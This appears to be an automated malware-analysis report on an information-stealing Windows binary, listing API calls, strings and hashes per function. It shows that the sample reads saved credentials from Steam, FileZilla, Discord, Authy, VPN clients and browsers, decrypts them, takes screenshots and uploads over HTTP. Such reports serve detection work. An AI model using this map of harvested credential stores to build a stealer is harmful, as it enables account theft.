\SteamAppData.vdf, xrefs: 00D346DD
dv, xrefs: 00D33DFC
username, xrefs: 00D34210
o, xrefs: 00D33E32
InternetConnectW, xrefs: 00D31ADC
Advapi32.dll, xrefs: 00D314C1, 00D31962
d., xrefs: 00D33E1E
PathCombineW, xrefs: 00D31BEA
RegCloseKey, xrefs: 00D319FE
FileZilla\recentservers.xml, xrefs: 00D343BE
InternetOpenW, xrefs: 00D31AC4
Steam\config\loginusers.vdf, xrefs: 00D346C9
shlwapi.dll, xrefs: 00D3161F, 00D31B6F, 00D31B7B, 00D31B83
Steam\config\config.vdf, xrefs: 00D346A6
Steam\%s, xrefs: 00D34775
C:\\Windows\\SysWOW64\\, xrefs: 00D30626, 00D3062D, 00D318C1, 00D318C6, 00D3195A, 00D31A89, 00D31B67
credmanager.txt, xrefs: 00D34618
bq, xrefs: 00D33E4C
\loginusers.vdf, xrefs: 00D346BA
FindFirstFileW, xrefs: 00D31844
HttpOpenRequestW, xrefs: 00D31AF7
ReadFile, xrefs: 00D31898
C:\\Windows\\SysWOW64\\kernel32.dll, xrefs: 00D3043F
Software\Microsoft\Windows\CurrentVersion\Uninstall\Discord, xrefs: 00D3454F
RegEnumKeyExW, xrefs: 00D319AB
C:\\Windows\\SysWOW64\\, xrefs: 00D300FD
CloseHandle, xrefs: 00D318AD

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: DirectorySystemWow64lstrcpy
String ID: %S.txt$%s%s%s%S$Advapi32.dll$AppData$Authy Desktop$C:\\Windows\\SysWOW64\\$C:\\Windows\\SysWOW64\\$C:\\Windows\\SysWOW64\\kernel32.dll$C:\\Windows\\System32\\$C:\\Windows\\System32\\kernel32.dll$CRYPT32.dll$CloseHandle$CreateFileW$CredEnumerateW$CredFree$CryptStringToBinaryA$CryptStringToBinaryW$CryptUnprotectData$FileZilla\recentservers.xml$FileZilla\sitemanager.xml$FindClose$FindFirstFileW$FindNextFileW$FreeLibrary$GetCurrentHwProfileA$GetProcAddress$HttpOpenRequestW$HttpSendRequestW$InstallLocation$InternetCloseHandle$InternetConnectW$InternetOpenW$InternetReadFile$IsTextUnicode$LoadLibraryW$Local AppData$NordVPN$PathCombineW$PathFileExistsW$PathFindNextComponentW$ProtonVPN$Psi\profiles\default\accounts.xml$ReadFile$RegCloseKey$RegEnumKeyExW$RegOpenKeyExW$RegQueryInfoKeyW$RegQueryValueExW$SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders$Software\Microsoft\Windows\CurrentVersion\Uninstall\Discord$Software\Valve\Steam$SourceModInstallPath$Steam\%s$Steam\config\SteamAppData.vdf$Steam\config\config.vdf$Steam\config\loginusers.vdf$StrChrA$StrChrW$StrRChrW$StrStrA$StrStrW$\SteamAppData.vdf$\loginusers.vdf$ad$auth-data$bi$bq$cm$config\config.vdf$credmanager.txt$d$d.$discord$dv$entropy$f$fi$filezilla.log$fo$foo1.zip$o$om$passwords_all.txt$pu$shlwapi.dll$ssfn$username$wininet.dll$x$x$x
API String ID: 1523062325-2065997491
Opcode ID: 6854816d893d2a6f2f29854bd07dc8d248b467737279e8125b23bf93099b4c91
Instruction ID: 9145ffa66f4ded6a430c5f2723369a92059781da0d02e9b7e091af6e64c7d754
Opcode Fuzzy Hash: 6854816d893d2a6f2f29854bd07dc8d248b467737279e8125b23bf93099b4c91
Instruction Fuzzy Hash: FA834F2525E3C0D9E320CB68AC52BAA77A1EF95B54F14581FE188CB3B1E7B21544C73B

Uniqueness

Uniqueness Score: -1.00%

Function 00D336D1, Relevance: 157.0, APIs: 46, Strings: 43, Instructions: 1255stringmemoryCOMMON

Download Yara Rule

APIs

GlobalFree.KERNEL32 ref: 00D338A0
GlobalFree.KERNEL32 ref: 00D338B0
GlobalFree.KERNEL32 ref: 00D338C0
GlobalFree.KERNEL32 ref: 00D338D0

Part of subcall function 00D96544: RegOpenKeyExW.KERNELBASE ref: 00D9658E
Part of subcall function 00D96544: RegQueryInfoKeyW.ADVAPI32 ref: 00D965BD
Part of subcall function 00D96544: RegEnumKeyExW.ADVAPI32 ref: 00D9660A
Part of subcall function 00D96544: GlobalAlloc.KERNEL32(00000040,00000400), ref: 00D96625
Part of subcall function 00D96544: RegCloseKey.ADVAPI32 ref: 00D96684

wsprintfA.USER32 ref: 00D342A5
lstrlenW.KERNEL32(?,?), ref: 00D34302

Part of subcall function 00D24EBA: __aullrem.LIBCMT ref: 00D25160

GlobalFree.KERNEL32 ref: 00D34349
GlobalFree.KERNEL32 ref: 00D3435A
GlobalFree.KERNEL32 ref: 00D3436B
GlobalFree.KERNEL32 ref: 00D3437C
GlobalFree.KERNEL32 ref: 00D3450E
GlobalFree.KERNEL32 ref: 00D3453E
PathCombineW.SHLWAPI ref: 00D34202

Part of subcall function 00D96D36: RegOpenKeyExW.KERNELBASE ref: 00D96D57
Part of subcall function 00D96D36: RegQueryValueExW.KERNELBASE ref: 00D96D7B
Part of subcall function 00D96D36: GlobalAlloc.KERNEL32(00000040,?), ref: 00D96D8B
Part of subcall function 00D96D36: RegQueryValueExW.KERNELBASE ref: 00D96DBB

Part of subcall function 00D36021: CryptUnprotectData.CRYPT32 ref: 00D36061

PathCombineW.SHLWAPI ref: 00D343D0
lstrcpyW.KERNEL32 ref: 00D336DC

Part of subcall function 00D96B54: lstrlenW.KERNEL32(00000000,767F8B40,00D9A735,?,00000073,00000068,?), ref: 00D96B58

Part of subcall function 00D361C3: lstrcatW.KERNEL32(00000000,00DCEEA0), ref: 00D361F6
Part of subcall function 00D361C3: FindFirstFileW.KERNELBASE ref: 00D36212
Part of subcall function 00D361C3: FindNextFileW.KERNELBASE ref: 00D36239
Part of subcall function 00D361C3: PathCombineW.KERNELBASE ref: 00D36286
Part of subcall function 00D361C3: FindNextFileW.KERNELBASE ref: 00D364A1
Part of subcall function 00D361C3: FindClose.KERNELBASE ref: 00D364C2
Part of subcall function 00D361C3: GlobalFree.KERNEL32 ref: 00D364C5

lstrcpyW.KERNEL32 ref: 00D336FF
GlobalFree.KERNEL32 ref: 00D33718
StrStrW.SHLWAPI ref: 00D33773
lstrcpyW.KERNEL32 ref: 00D33785
GlobalFree.KERNEL32 ref: 00D337A6
GlobalFree.KERNEL32 ref: 00D337F1
PathCombineW.SHLWAPI ref: 00D34403
wsprintfW.USER32 ref: 00D344A1
lstrlenW.KERNEL32(00000000,?), ref: 00D344B0
GlobalFree.KERNEL32 ref: 00D344CB
GlobalFree.KERNEL32 ref: 00D344E5
GlobalFree.KERNEL32 ref: 00D34593
PathCombineW.SHLWAPI ref: 00D345E4
GlobalFree.KERNEL32 ref: 00D34610
PathCombineW.SHLWAPI ref: 00D346A2
lstrlenW.KERNEL32(00000000), ref: 00D346B1
lstrlenW.KERNEL32(00000000), ref: 00D346D4
lstrcpyW.KERNEL32 ref: 00D346FB
lstrcatW.KERNEL32(00000000,00DCEE50), ref: 00D34707
GlobalFree.KERNEL32 ref: 00D34711
StrStrW.SHLWAPI ref: 00D34760
wsprintfW.USER32 ref: 00D3477B
lstrcpyW.KERNEL32 ref: 00D347AB
GlobalFree.KERNEL32 ref: 00D347E4
lstrcpyA.KERNEL32(00000000,00DCEAC4,00000077,SourceModInstallPath,?,00000000), ref: 00D348AB
GlobalFree.KERNEL32 ref: 00D348C4
GlobalAlloc.KERNELBASE(00000040,?), ref: 00D348EA
GlobalFree.KERNEL32 ref: 00D34915
GlobalFree.KERNEL32 ref: 00D3496A
GlobalFree.KERNEL32 ref: 00D3497A
GlobalFree.KERNEL32 ref: 00D3498A

Part of subcall function 00D24EBA: __aullrem.LIBCMT ref: 00D24F5C
Part of subcall function 00D24EBA: __aulldiv.LIBCMT ref: 00D24F76

Strings

cm, xrefs: 00D33E28
fi, xrefs: 00D33DDE
ssfn, xrefs: 00D34752
Steam\config\SteamAppData.vdf, xrefs: 00D346EC
discord, xrefs: 00D34568
bi, xrefs: 00D33E66
ad, xrefs: 00D33D13
foo1.zip, xrefs: 00D34882
Psi\profiles\default\accounts.xml, xrefs: 00D345D0
SourceModInstallPath, xrefs: 00D3465D
Authy Desktop, xrefs: 00D34599
pu, xrefs: 00D33D1D
d, xrefs: 00D33E44
fo, xrefs: 00D33DE8
config\config.vdf, xrefs: 00D34690
x, xrefs: 00D33E16
\SteamAppData.vdf, xrefs: 00D346DD
dv, xrefs: 00D33DFC
f, xrefs: 00D33E0E
om, xrefs: 00D33E3A
username, xrefs: 00D34210
%s%s%s%S, xrefs: 00D3449B
o, xrefs: 00D33E32
filezilla.log, xrefs: 00D3442F
Software\Valve\Steam, xrefs: 00D34657
d., xrefs: 00D33E1E
auth-data, xrefs: 00D34255
FileZilla\recentservers.xml, xrefs: 00D343BE
Steam\config\loginusers.vdf, xrefs: 00D346C9
%S.txt, xrefs: 00D3429F
entropy, xrefs: 00D34236
Steam\config\config.vdf, xrefs: 00D346A6
Steam\%s, xrefs: 00D34775
ProtonVPN, xrefs: 00D3438D
credmanager.txt, xrefs: 00D34618
bq, xrefs: 00D33E4C
InstallLocation, xrefs: 00D34555
\loginusers.vdf, xrefs: 00D346BA
NordVPN, xrefs: 00D34397
x, xrefs: 00D33E56
Software\Microsoft\Windows\CurrentVersion\Uninstall\Discord, xrefs: 00D3454F
FileZilla\sitemanager.xml, xrefs: 00D343EF
x, xrefs: 00D33E06

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$Free$CombinePathlstrcpy$lstrlen$Find$AllocFileQuerywsprintf$CloseNextOpenValue__aullremlstrcat$CryptDataEnumFirstInfoUnprotect__aulldiv
String ID: %S.txt$%s%s%s%S$Authy Desktop$FileZilla\recentservers.xml$FileZilla\sitemanager.xml$InstallLocation$NordVPN$ProtonVPN$Psi\profiles\default\accounts.xml$Software\Microsoft\Windows\CurrentVersion\Uninstall\Discord$Software\Valve\Steam$SourceModInstallPath$Steam\%s$Steam\config\SteamAppData.vdf$Steam\config\config.vdf$Steam\config\loginusers.vdf$\SteamAppData.vdf$\loginusers.vdf$ad$auth-data$bi$bq$cm$config\config.vdf$credmanager.txt$d$d.$discord$dv$entropy$f$fi$filezilla.log$fo$foo1.zip$o$om$pu$ssfn$username$x$x$x
API String ID: 2440989282-4068252810
Opcode ID: cb33a1bbe8e0cf59ee6beaffe3187b8c7da6c787c3bc421d60ad4c34099534b1
Instruction ID: 39603d9511fbe3d5fbd5ce76ffae08eab8ed04e313a591b5b9b200977132dcc8
Opcode Fuzzy Hash: cb33a1bbe8e0cf59ee6beaffe3187b8c7da6c787c3bc421d60ad4c34099534b1
Instruction Fuzzy Hash: B4A2BE313593809AE730DB64E851BEFB3A1EFC5750F04092EE5898B2A1EBB19944C777

Uniqueness

Uniqueness Score: -1.00%

Function 00D361C3, Relevance: 65.0, APIs: 32, Strings: 5, Instructions: 223stringmemoryfileCOMMON

Download Yara Rule

APIs

Part of subcall function 00D96699: GlobalAlloc.KERNELBASE(00000040,0000FFFE,00000074,00000064,00D336C7), ref: 00D966A4
Part of subcall function 00D96699: StrStrW.KERNELBASE ref: 00D966C9
Part of subcall function 00D96699: lstrcpyW.KERNEL32 ref: 00D966D6
Part of subcall function 00D96699: lstrcpyW.KERNEL32 ref: 00D966E5

lstrcatW.KERNEL32(00000000,00DCEEA0), ref: 00D361F6
FindFirstFileW.KERNELBASE ref: 00D36212
FindNextFileW.KERNELBASE ref: 00D36239
PathCombineW.KERNELBASE ref: 00D36286
StrStrW.SHLWAPI ref: 00D362B3
StrStrW.SHLWAPI ref: 00D362D1
StrStrW.SHLWAPI ref: 00D362EF
lstrlenW.KERNEL32(00000000), ref: 00D36301
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00D36311
lstrcpyW.KERNEL32 ref: 00D36323
lstrlenW.KERNEL32(00000000,0000005C,Cookies), ref: 00D3633E
StrRChrW.SHLWAPI ref: 00D36357
lstrcpyW.KERNEL32 ref: 00D3635D
lstrlenW.KERNEL32(00000000), ref: 00D36364
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00D36374
lstrcpyW.KERNEL32 ref: 00D36386
lstrlenW.KERNEL32(00000000,0000005C,History), ref: 00D36394
StrRChrW.SHLWAPI ref: 00D363AD
lstrcpyW.KERNEL32 ref: 00D363B3
lstrlenW.KERNEL32(00000000), ref: 00D363BA
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00D363CA
lstrcpyW.KERNEL32 ref: 00D363DC
lstrlenW.KERNEL32(00000000,0000005C,Web Data), ref: 00D363EA
StrRChrW.SHLWAPI ref: 00D36403
lstrcpyW.KERNEL32 ref: 00D36409
lstrlenW.KERNEL32(00000000), ref: 00D36410
GlobalAlloc.KERNEL32(00000040,00000000), ref: 00D36420
lstrcpyW.KERNEL32 ref: 00D36432
GlobalAlloc.KERNEL32(00000040,00000218), ref: 00D36448
FindNextFileW.KERNELBASE ref: 00D364A1
FindClose.KERNELBASE ref: 00D364C2
GlobalFree.KERNEL32 ref: 00D364C5

Strings

Cookies, xrefs: 00D36336
History, xrefs: 00D3638C
-journal, xrefs: 00D362C5
Web Data, xrefs: 00D363E2
Login Data, xrefs: 00D362A7, 00D362E3

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: lstrcpy$Globallstrlen$Alloc$Find$File$Next$CloseCombineFirstFreePathlstrcat
String ID: -journal$Cookies$History$Login Data$Web Data
API String ID: 1420895709-891042480
Opcode ID: f0a41e6e34bfae6c1d47a6c4388efcd4e1c17ed26379455db16c2872ade1cd89
Instruction ID: 19cdd2e678f36f7ef2a62609cffca999acf1e141a648446729265ccf4afcfded
Opcode Fuzzy Hash: f0a41e6e34bfae6c1d47a6c4388efcd4e1c17ed26379455db16c2872ade1cd89
Instruction Fuzzy Hash: AE816CB0A4431AEBDB10AF74ED49A6ABB68EF44311F044256E906E33A1DB709E44CB74

Uniqueness

Uniqueness Score: -1.00%

Function 00D99A49, Relevance: 35.2, APIs: 18, Strings: 2, Instructions: 227memorywindowCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000066,0000006E), ref: 00D99A67
KiUserCallbackDispatcher.NTDLL ref: 00D99A6F
GetSystemMetrics.USER32 ref: 00D99A7D
GetDC.USER32(00000000), ref: 00D99AAF
GetCurrentObject.GDI32(00000000,00000007), ref: 00D99ABE
GetObjectW.GDI32(00000000,00000018,?), ref: 00D99AD2
DeleteObject.GDI32(00000000), ref: 00D99AF1
CreateCompatibleDC.GDI32(?), ref: 00D99B69
CreateDIBSection.GDI32(?,?,00000000,?,00000000,00000000), ref: 00D99B8B
SelectObject.GDI32(?,00000000), ref: 00D99B9E
BitBlt.GDI32(?,00000000,00000000,?,?,?,?,00000000,00CC0020), ref: 00D99BC8
GlobalAlloc.KERNELBASE(00000040,?), ref: 00D99BD7
GlobalAlloc.KERNELBASE(00000040,?), ref: 00D99C0A
GlobalFree.KERNEL32 ref: 00D99D63
GlobalFree.KERNEL32 ref: 00D99D6A
DeleteDC.GDI32(?), ref: 00D99D76
ReleaseDC.USER32 ref: 00D99D84
DeleteObject.GDI32(?), ref: 00D99D90

Strings

(, xrefs: 00D99B47
screenshot.png, xrefs: 00D99D13

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Object$Global$Delete$AllocCreateFree$CallbackCompatibleCurrentDispatcherHeapMetricsProcessReleaseSectionSelectSystemUser
String ID: ($screenshot.png
API String ID: 1389825944-3058043257
Opcode ID: a8072388ee81adbf4bb17d5a494aee20b1be4aa867bdebf8a313a751abcca680
Instruction ID: af42f92956bfc335fd4d4ec73fdfebc4a5b414fcaaf13edc06025c137c179257
Opcode Fuzzy Hash: a8072388ee81adbf4bb17d5a494aee20b1be4aa867bdebf8a313a751abcca680
Instruction Fuzzy Hash: 92A10971901228DFEB24AF28DD45BA9FBF5FF49300F0481DAE589A6250DB705E859FA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D349A9, Relevance: 27.2, APIs: 12, Strings: 3, Instructions: 970networkmemoryfileCOMMON

Download Yara Rule

APIs

InternetOpenW.WININET ref: 00D35589
InternetConnectW.WININET ref: 00D355C8
HttpOpenRequestW.WININET ref: 00D355FE
GlobalAlloc.KERNELBASE(00000040,?), ref: 00D3561C
lstrlenW.KERNEL32(?,00000000,?), ref: 00D35666
HttpSendRequestW.WININET ref: 00D35683
InternetReadFile.WININET ref: 00D356AE
StrStrA.SHLWAPI ref: 00D356CE
GlobalFree.KERNEL32 ref: 00D356D8
InternetCloseHandle.WININET ref: 00D356F3
InternetCloseHandle.WININET ref: 00D3570F
InternetCloseHandle.WININET ref: 00D35725

Strings

GET, xrefs: 00D355F0
bad, xrefs: 00D356C0
P, xrefs: 00D354DB

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Internet$CloseHandle$GlobalHttpOpenRequest$AllocConnectFileFreeReadSendlstrlen
String ID: GET$P$bad
API String ID: 687345375-470362918
Opcode ID: 71893579572a35e0f9cfaaadbec636447e4e01839ce62c5d5c3aca68b54cfb3a
Instruction ID: 35301fb565a2a9bc0bfd5722abbbc81bff30f9ce0d7f5ac5b25520197dc3bf5b
Opcode Fuzzy Hash: 71893579572a35e0f9cfaaadbec636447e4e01839ce62c5d5c3aca68b54cfb3a
Instruction Fuzzy Hash: E4821625A6936899EB208B90DC15BEEA335FF54750F1054DBD50CEB2A0E7B21FC0CB5A

Uniqueness

Uniqueness Score: -1.00%

Function 00D94693, Relevance: 25.8, APIs: 17, Instructions: 251memoryfileencryptionCOMMON

Download Yara Rule

APIs

PathFileExistsW.KERNELBASE ref: 00D9476C
CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D94795
GetFileSize.KERNEL32(00000000,00000000,?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D947A5
GlobalAlloc.KERNELBASE(00000040,00000001,?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D947BF
ReadFile.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D947E7
IsTextUnicode.ADVAPI32(?,80000000,00000007), ref: 00D94804
GlobalAlloc.KERNELBASE(00000040,00000000,?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D9481A
MultiByteToWideChar.KERNEL32(0000FDE9,00000000,00000000,?,00000000,?,?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D94831
GlobalFree.KERNEL32 ref: 00D9483D
CloseHandle.KERNEL32(?,?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D94846
StrStrW.SHLWAPI(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D9486B
StrChrW.SHLWAPI(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D9488C
CryptUnprotectData.CRYPT32(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D948D4
GlobalAlloc.KERNEL32(00000040,?,?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 00D948DF
GlobalFree.KERNEL32 ref: 00D9490B
GlobalFree.KERNEL32 ref: 00D9491A
GlobalFree.KERNEL32 ref: 00D94921

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$FileFree$Alloc$ByteCharCloseCreateCryptDataExistsHandleMultiPathReadSizeTextUnicodeUnprotectWide
String ID:
API String ID: 1674493309-0
Opcode ID: 21323ac113aa7c1062dc5ba410c74d334222539bc4f0d97588894db4884e5000
Instruction ID: 607a71fd858eb17ca40df0e75fc6b7e3d8ef3b529a468a6f0234f25c6a09c52a
Opcode Fuzzy Hash: 21323ac113aa7c1062dc5ba410c74d334222539bc4f0d97588894db4884e5000
Instruction Fuzzy Hash: C7816231E54319EBDF149FA9EC49AAEBBB5FF48710F04011AE505EB2A0EB716D01CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00DA76C1, Relevance: 12.6, APIs: 5, Strings: 2, Instructions: 330timeCOMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00DA777E
_free.LIBCMT ref: 00DA794A
_free.LIBCMT ref: 00DA79C2
GetTimeZoneInformation.KERNELBASE(?,?,00000000,?,?,00000000,?,?,?,?,?,?,00DA7B83,?,?,00000000), ref: 00DA79D4

Strings

Pacific Daylight Time, xrefs: 00DA7A81
Pacific Standard Time, xrefs: 00DA7A6D

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: _free$InformationTimeZone
String ID: Pacific Daylight Time$Pacific Standard Time
API String ID: 597776487-1154798116
Opcode ID: ce07823d6f51357f994e4234e426f1a24ac9ff18e6df702401ebd6df55faae26
Instruction ID: 6b7812cff589379d3473d84f382fbb3d1c73873fe40407d1ae534a7fb5247c3c
Opcode Fuzzy Hash: ce07823d6f51357f994e4234e426f1a24ac9ff18e6df702401ebd6df55faae26
Instruction Fuzzy Hash: C5A10672904215ABDB10BF65DC46AAEBBB9EF07710F18416AF904DB291E7319E41CBB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D9388D, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 76memoryencryptionCOMMON

Download Yara Rule

APIs

GlobalAlloc.KERNEL32(00000040,00007FFF), ref: 00D938A4
StrStrA.SHLWAPI(?,v10), ref: 00D938C6
GlobalFree.KERNEL32 ref: 00D938FB
CryptUnprotectData.CRYPT32(?,v10), ref: 00D93931

Strings

v10, xrefs: 00D938B2

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: Global$AllocCryptDataFreeUnprotect
String ID: v10
API String ID: 1326552609-1337588462
Opcode ID: 91094f85956c3f34d4544236db1a74080678ab7d3eea00ffc4aa14e8b26f8877
Instruction ID: 37d8d3ca077d620990a0ef975b0588517a8a6f9c0d2ec9f3fc1206c42024762f
Opcode Fuzzy Hash: 91094f85956c3f34d4544236db1a74080678ab7d3eea00ffc4aa14e8b26f8877
Instruction Fuzzy Hash: EB219A39A0021AEBCF019F58CC41AAEBBBAEF84344B044166F905E7310DBB19E15CFB0

Uniqueness

Uniqueness Score: -1.00%

Function 00D2F3DF, Relevance: 8.1, Strings: 6, Instructions: 584COMMON

Download Yara Rule

Strings

sRGB, xrefs: 00D2F8EF
LodePNG, xrefs: 00D2FBB8
20201017, xrefs: 00D2FBB3
IEND, xrefs: 00D2FC9C
IDAT, xrefs: 00D2FA99
gAMA, xrefs: 00D2F910

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID: 20201017$IDAT$IEND$LodePNG$gAMA$sRGB
API String ID: 0-3319655610
Opcode ID: e05ebc89b51f6932c1dacedc778659d118fff20ce55f7c66c6c867128206b652
Instruction ID: c93b8f46ac29a7344b7a902efe7024a7a173e412a6059771acb5c3a3f3384188
Opcode Fuzzy Hash: e05ebc89b51f6932c1dacedc778659d118fff20ce55f7c66c6c867128206b652
Instruction Fuzzy Hash: 95424D7190062A8BDF25DF14DC80BEEB7B5EF64309F0448B9D80DAB255EB719A85CF60

Uniqueness

Uniqueness Score: -1.00%

Function 00D3F41E, Relevance: 1.5, APIs: 1, Instructions: 34COMMON

Download Yara Rule

APIs

GetSystemInfo.KERNELBASE ref: 00D3F43D

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID: InfoSystem
String ID:
API String ID: 31276548-0
Opcode ID: ac307c1a3c6b6d48d3311421cd62dd69249bff13014afc5e1be7824ada155b6f
Instruction ID: 944d7a1834e5a3c7d1feee9faedba1aea0c852c844d09a35894511b1e1f7171e
Opcode Fuzzy Hash: ac307c1a3c6b6d48d3311421cd62dd69249bff13014afc5e1be7824ada155b6f
Instruction Fuzzy Hash: 54E06D322913206BC631B77AAC5BF8B5E89EF81FA0F154017F104EA3D1DDA06841A2B5

Uniqueness

Uniqueness Score: -1.00%

Function 00D2AC73, Relevance: .7, Instructions: 674COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.345958156.0000000000D21000.00000020.00020000.sdmp, Offset: 00D20000, based on PE: true

Associated: 00000000.00000002.345953381.0000000000D20000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346032038.0000000000DB3000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.346058906.0000000000DD7000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.346066592.0000000000DDC000.00000002.00020000.sdmp Download File

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4fbe774a018feae8700b187aacaa2d0a9c9f5d5a3acb37123e15b7ce3cc0e88e
Instruction ID: 935847114603e8cdc019bf4b8aa4144c2d6d1d133ccf32682823a0f3eff83598
Opcode Fuzzy Hash: 4fbe774a018feae8700b187aacaa2d0a9c9f5d5a3acb37123e15b7ce3cc0e88e
Instruction Fuzzy Hash: 06428D74A042199FCB15CFA8D590AADFBB1FF59314F18806EE555AB342C771AD02CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00D93026, Relevance: 112.3, APIs: 2, Strings: 62, Instructions: 326libraryCOMMON

Download Yara Rule

APIs

PathCombineW.SHLWAPI ref: 00D93369
LoadLibraryW.KERNELBASE ref: 00D93380

Strings

Decr, xrefs: 00D9330C
a, xrefs: 00D932A9
cjaf, xrefs: 00D93244
BCr, xrefs: 00D933DC, 00D933DF
ChainingMode, xrefs: 00D93427
as, xrefs: 00D932B6
ik, xrefs: 00D93269
p, xrefs: 00D9316A
hs, xrefs: 00D932A3
m, xrefs: 00D932DF
ca, xrefs: 00D9317B
BCry, xrefs: 00D933A4, 00D933A9
mm, xrefs: 00D932AD
er, xrefs: 00D9323E
r, xrefs: 00D93205
lg, xrefs: 00D931FC
Pr, xrefs: 00D9325F
r, xrefs: 00D931A4
vi, xrefs: 00D931F3
BCr, xrefs: 00D933C1, 00D933C4
yptO, xrefs: 00D93144
BC, xrefs: 00D93121
my, xrefs: 00D93195
er, xrefs: 00D93289
y, xrefs: 00D93256
